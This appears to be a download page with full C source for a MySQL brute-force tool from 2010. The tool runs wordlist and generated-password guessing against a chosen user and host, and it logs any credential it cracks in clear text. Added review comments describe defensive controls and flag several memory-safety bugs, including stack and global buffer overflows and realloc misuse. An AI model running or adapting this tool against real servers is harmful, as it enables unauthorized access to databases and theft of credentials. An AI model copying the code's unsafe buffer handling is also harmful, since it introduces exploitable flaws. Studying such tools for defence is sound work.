Linux Source and Binaries
mysql-bruteforce.c (Sourcecode)
mysql-bruteforce.tar (sourcecode tarball)
mysql-bruteforce-binary-only.tar (compiled Binary)
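You need to install ncurses (the compile line in the source also links -lmysqlclient, so the MySQL client development headers and library are required as well)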
apt-get install libncurses5-dev libncurses5
Windows Source and Binaries
mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows
Here is the Source (Linux)
#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>
// Output language: German (Deutsch) or English.
// The `#if ENG && !GER` guards in main() select the English strings only when
// ENG is 1 and GER is 0; with the values below the German strings are compiled in.
#define GER 1
#define ENG 0
/*
**************************************************************************************************
* MYSQL Bruteforce Programm aus purer lange Weile geschrieben
* 23.03 2010 by cd
*
* gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
* oder -O6 anstatt -O2
* ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
* log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
* for the people that understand no german change the #define ENG to 1 and GER to 0
*
* compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
* or -O6 instead of -O2
* usage: ./mysql-bruteforce user host <password list> <optional len of password>
* log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
* Newest version http://bruteforce.at/mysql
*
* Think about the old good time MoD
* If you want to survive out here, you've got to know where your towel is.
*/
// File-scope state shared with main().
MYSQL *my;          // client handle, assigned from mysql_init(NULL) in main()
int count=0;        // incremented once per generated candidate; never read in the visible source
char *passwd;       // not referenced anywhere in the visible source
#define STARTCHR 46 // first byte value of the generated character range (ASCII '.'); the author notes 33 as an alternative
#define ENDCHR 122 // last byte value of the generated character range (ASCII 'z'); the author notes 127 as an alternative
#define BUFF_SIZE 1024 // size of `buffer`, which receives one wordlist token at a time
#define LEN 80      // not referenced anywhere in the visible source
char buffer[BUFF_SIZE]; // NOTE(review): filled by an unbounded fscanf("%s") in main(); nothing enforces BUFF_SIZE
int jump=0;         // 1 when argv[3] is "-b" (generated candidates), 0 for wordlist mode
/*
 * Entry point. Expects: argv[1] = user, argv[2] = host, argv[3] = wordlist path
 * or "-b", argv[4] = optional length, argv[5] = optional start word (-b only).
 *
 * Each candidate is passed to mysql_real_connect() as the password. On the
 * first successful connect the credential is shown on screen and appended to
 * "mysql-bruteforce.log" as user:pass@host.
 *
 * Returns 0 on every path (usage, errors, success, exhausted candidates)
 * except a failed realloc, which returns 1 -- the exit status therefore does
 * not tell a caller whether anything was found.
 *
 * Defender's view: every candidate is a separate authentication attempt from
 * one client against one account, so on the server this looks like a dense
 * run of access-denied errors from a single source. Failed-login throttling
 * or account locking (e.g. the connection_control plugin, or per-account
 * FAILED_LOGIN_ATTEMPTS / PASSWORD_LOCK_TIME on MySQL 8.0), not exposing the
 * listener to untrusted networks, and alerting on such bursts are the
 * relevant controls.
 *
 * NOTE(review): the body has several memory-safety defects (unbounded copies
 * into 20-byte stack buffers, an undersized heap buffer, a discarded realloc
 * result, realloc on an argv string, an unbounded fscanf). They are flagged
 * inline; treat the program as unsafe to run on untrusted arguments or
 * wordlists.
 */
int main (int argc, char *argv[])
{
// Fewer than three arguments after the program name: print usage and stop.
if (argc <= 3 )
{
#if ENG && !GER
printf("\n"
"\n MySQL Bruteforce, written by cd\n\n"
" via wordlist\n"
" %s root localhost wordlist # use complete wordlist\n"
" %s root 127.0.0.1 ../wordlist 7 # serch only words with 7 chars\n"
"\n"
" standard bruteforce\n"
" %s root localhost -b # Bruteforce Method (standard up to 8 chars)\n"
" %s root 127.0.0.1 -b 12 # up to 12 chars\n"
" %s root host -b 12 Test # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
printf("\n"
"\n MySQL Bruteforce, geschrieben von cd\n\n"
" via Wörterliste\n"
" %s root localhost wordlist # Gesamte Wörterliste durchsuchen\n"
" %s root 127.0.0.1 ../wordlist 7 # suche nur Wörter mit 7 Buchstaben\n"
"\n"
" Standard Bruteforce\n"
" %s root localhost -b # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
" %s root 127.0.0.1 -b 12 # bis zu 12 Buchstaben\n"
" %s root host -b 12 Test # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
return 0;
}
// strcmp() returns non-zero when argv[3] is NOT "-b": that is wordlist mode (jump=0).
if(strcmp(argv[3],"-b"))
{
jump=0;
} else jump=1;
// Switch the terminal into curses mode; every return below calls endwin() first.
initscr();
printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
refresh();
// NOTE(review): fixed 20-byte buffers; they are filled further down by an
// unbounded sprintf() from argv[1]/argv[2].
char host[20];
char user[20];
my = mysql_init(NULL);
FILE *pass_list,*logfile;
// fopen() is attempted even in -b mode (with the literal name "-b"); a NULL
// result is only treated as an error in wordlist mode. If a file named "-b"
// exists it is opened and never closed.
if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}
// Result log, opened for append in the current working directory.
// NOTE(review): on failure the message below names argv[3], not the log file
// that actually failed to open, and pass_list is left open.
if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}
// mysql_init() result is only checked here, after both files were opened;
// neither file is closed on this path.
if(my == NULL)
{
#if ENG && !GER
fprintf(stderr, "Initialization failed\n");
#else
fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
endwin();
return 0;
}
// NOTE(review): stack buffer overflow -- sprintf() copies argv[1]/argv[2]
// without a bound into 20-byte arrays; any user or host name of 20 or more
// characters writes past the end. A bounded copy with a truncation check is
// needed here.
sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);
// "eingabe" = "input": mode selector, 'b' for generated candidates, 'w' for wordlist.
char eingabe;
#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif
if (jump==1)
{
refresh();
eingabe='b';
}
else {eingabe='w';}
// Only 'b' has a case; 'w' matches nothing and control continues with the
// wordlist loop after the switch.
switch(eingabe)
{
case 'b':
// Every path through this loop body returns, so it runs at most once and the
// `break` after it is unreachable.
while(1)
{
// min/max: shortest and longest candidate length; max defaults to 8.
int min=1,max;
if (argc<=4)
{
max=8;
}
else
{
// NOTE(review): atoi() gives no error indication; a non-numeric or negative
// argv[4] is used as-is.
max=atoi(argv[4]);
}
// NOTE(review): allocates min (1) byte, result unchecked; the store to
// pass[min] on the line after next is one byte past the allocation. pass[0]
// is also never initialised before the first length is tried (the memset
// below only runs for x>min), so the first candidate reads an indeterminate byte.
char *pass=(char*)malloc(min);
int pos,x,found;
pass[min]='\0';
// Optional start word: begin from argv[5] instead of an empty buffer.
if (argc>=6)
{
min=strlen(argv[5]);
// NOTE(review): the malloc'd buffer is leaked here and pass now points at an
// argv string, which is later handed to realloc() (undefined behaviour for a
// non-heap pointer). pass[min+1] writes one byte beyond argv[5]'s terminator.
pass=argv[5];
pass[min+1]='\0';
pos=min;
// The start word must be exactly as long as the number given after -b
// (signed int compared against size_t).
if (atoi(argv[4])!=strlen(argv[5]))
{
#if ENG && !GER
mvprintw(7,0,"len of word must be the same the digit after -b\n"
"like: %s root localhost -b 4 abcd\n",argv[0]);
#else
mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
"z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
refresh();
endwin();
return 0;
}
}
// x is the current candidate length.
for(x=min;x<=max;x++)
{
if(x>min)
{
// NOTE(review): realloc()'s return value is only tested, never assigned. If
// the allocation moves, pass is left dangling and everything below writes to
// freed memory. The requested size x also leaves no room for the terminator
// stored at pass[x].
if (realloc(pass, x))
{
// Reset the buffer to x copies of STARTCHR for the new length.
memset(pass, STARTCHR, x);
pass[x]='\0';
} else {
mvprintw(13,1,"error in realloc");
endwin();
return 1;
}
}
// Runs until the first character of the buffer reaches ENDCHR.
while(pass[0]<ENDCHR)
{
found=0;
// One authentication attempt per candidate; NULL means the connect failed.
if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0) == NULL)
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",pass);
refresh();
}
else
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",pass);
refresh();
#if ENG && !GER
mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
refresh();
endwin();
mysql_close(my);
// NOTE(review): the credential is appended in clear text to a file in the
// working directory, and logfile is never fclose()d -- the write relies on
// stdio being flushed when main returns. Handle the log as sensitive data.
fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
return 0;
}
// Advance the buffer like an odometer: scanning from the last position down
// to index 1, the first position holding ENDCHR has itself and everything
// after it reset to STARTCHR and its left neighbour incremented.
for(pos=x-1;pos!=0;pos--)
{
if(pass[pos]==ENDCHR)
{
memset(pass+pos, STARTCHR, strlen(pass)-pos);
pass[pos-1]++;
found=1;
break;
}
}
// No position had reached ENDCHR: just step the last character.
if(!found)
pass[x-1]++;
count++;
}
}
// All lengths tried without a successful connect.
move(6,2);
deleteln();
#if ENG && !GER
mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
refresh();
endwin();
mysql_close (my);
return 0;
}
break;
}
// Wordlist mode starts here. dummy exists only so the `next:` label below has
// a statement to attach to.
int dummy;
// NOTE(review): "%s" has no field width, so a whitespace-delimited token of
// BUFF_SIZE or more characters overflows the global buffer. The wordlist is
// untrusted input and needs a width limit.
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
// Optional length filter: skip words whose length differs from argv[4]
// (size_t compared against the int returned by atoi()).
if (argv[4])
{
if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
}
// One authentication attempt per word; NULL means the connect failed.
if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0) == NULL)
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",buffer);
refresh();
}
else
{
move(6,2);
deleteln();
mvprintw(6,2,"Pass: %s",buffer);
refresh();
#if ENG && !GER
mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
refresh();
endwin();
mysql_close(my);
// NOTE(review): clear-text credential appended to the log; neither logfile
// nor pass_list is closed before returning.
fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
return 0;
}
next:
dummy=1;
}
// Wordlist exhausted without a successful connect; the files are left open.
move(6,2);
deleteln();
#if ENG && !GER
mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
refresh();
endwin();
mysql_close (my);
return 0;
}